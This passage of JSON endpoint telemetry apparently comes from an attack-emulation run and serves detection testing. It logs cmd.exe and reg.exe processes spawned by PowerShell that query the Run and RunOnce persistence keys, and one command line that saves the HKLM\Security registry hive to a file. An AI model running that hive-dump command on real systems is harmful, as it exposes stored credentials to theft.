"C:\\Windows\\System32\\cmd.exe", - "pid": 2912, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571314490000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00102CC75001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2912, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571314490000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00102CC75001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2912, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571314490000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00102CC75001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2912, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", 
- "timestamp": 131883571314490000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00102CC75001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2912, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571314490000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00102CC75001}" - }, - { - "command_line": "reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6956, - "ppid": 2912, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883571314690000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020C85001}", - "unique_ppid": "{42FC7E13-CB0B-5C05-0000-00102CC75001}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 6956, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314650000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020C85001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6956, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314650000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020C85001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6956, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314650000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020C85001}" - }, - { - "event_type": "image_load", - "image_name": 
"KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6956, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314650000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020C85001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6956, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314650000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020C85001}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 6956, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314650000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020C85001}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 6956, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314650000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020C85001}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6956, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314650000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020C85001}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6956, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314650000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020C85001}" - }, - { - "event_type": "process", - "pid": 6956, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 
131883571314650000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020C85001}" - }, - { - "event_type": "process", - "pid": 2912, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571314800000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00102CC75001}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 2788, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571314870000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001092C95001}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2788, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571314800000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001092C95001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2788, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571314800000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001092C95001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2788, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571314800000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001092C95001}" - }, - { - "event_type": 
"image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2788, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571314800000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001092C95001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2788, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571314800000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001092C95001}" - }, - { - "command_line": "reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5668, - "ppid": 2788, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883571314960000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001087CA5001}", - "unique_ppid": "{42FC7E13-CB0B-5C05-0000-001092C95001}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 5668, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314960000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001087CA5001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5668, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314960000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001087CA5001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5668, - 
"process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314960000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001087CA5001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5668, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314960000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001087CA5001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5668, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314960000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001087CA5001}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 5668, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314960000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001087CA5001}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 5668, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314960000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001087CA5001}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5668, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314960000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001087CA5001}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5668, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314960000, - 
"unique_pid": "{42FC7E13-CB0B-5C05-0000-001087CA5001}" - }, - { - "event_type": "process", - "pid": 5668, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883571314960000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001087CA5001}" - }, - { - "event_type": "process", - "pid": 2788, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571314960000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001092C95001}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 3496, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571315119984, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010DFCB5001}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3496, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571315110000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010DFCB5001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3496, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571315110000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010DFCB5001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": 
"C:\\Windows\\System32\\kernel32.dll", - "pid": 3496, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571315110000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010DFCB5001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3496, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571315110000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010DFCB5001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3496, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571315110000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010DFCB5001}" - }, - { - "command_line": "reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2152, - "ppid": 3496, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883571315220000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D4CC5001}", - "unique_ppid": "{42FC7E13-CB0B-5C05-0000-0010DFCB5001}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 2152, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571315110000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D4CC5001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2152, - "process_name": "reg.exe", - "process_path": 
"C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571315110000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D4CC5001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2152, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571315110000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D4CC5001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2152, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571315110000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D4CC5001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2152, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571315110000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D4CC5001}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 2152, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571315110000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D4CC5001}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 2152, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571315270000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D4CC5001}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2152, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571315270000, - "unique_pid": 
"{42FC7E13-CB0B-5C05-0000-0010D4CC5001}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 2152, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571315270000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D4CC5001}" - }, - { - "event_type": "process", - "pid": 2152, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883571315270000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D4CC5001}" - }, - { - "event_type": "process", - "pid": 3496, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571315270000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010DFCB5001}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg Query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 4548, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571315880000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ABCF5001}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4548, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571315890000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ABCF5001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4548, - "process_name": 
"cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571315890000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ABCF5001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4548, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571315890000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ABCF5001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4548, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571315890000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ABCF5001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4548, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571316050000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ABCF5001}" - }, - { - "command_line": "reg Query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 888, - "ppid": 4548, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883571316110000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010A3D05001}", - "unique_ppid": "{42FC7E13-CB0B-5C05-0000-0010ABCF5001}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 888, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571316050000, - "unique_pid": 
"{42FC7E13-CB0B-5C05-0000-0010A3D05001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 888, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571316050000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010A3D05001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 888, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571316050000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010A3D05001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 888, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571316050000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010A3D05001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 888, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571316050000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010A3D05001}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 888, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571316050000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010A3D05001}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 888, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571316050000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010A3D05001}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": 
"C:\\Windows\\System32\\rpcrt4.dll", - "pid": 888, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571316050000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010A3D05001}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 888, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571316050000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010A3D05001}" - }, - { - "event_type": "process", - "pid": 888, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883571316210000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010A3D05001}" - }, - { - "event_type": "process", - "pid": 4548, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571316210000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ABCF5001}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg save HKLM\\Security security.hive\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 132, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571316290000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001016D25001}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 132, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571316210000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001016D25001}" - 
}, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 132, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571316210000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001016D25001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 132, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571316210000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001016D25001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 132, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571316210000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001016D25001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 132, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571316210000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001016D25001}" - }, - { - "command_line": "reg save HKLM\\Security security.hive", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6700, - "ppid": 132, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883571316430000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}", - "unique_ppid": "{42FC7E13-CB0B-5C05-0000-001016D25001}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 6700, - "process_name": "reg.exe", - 
"process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571316360000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6700, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571316360000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6700, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571316360000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6700, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571316360000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6700, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571316360000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 6700, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571316360000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 6700, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571316360000, - "unique_pid": 
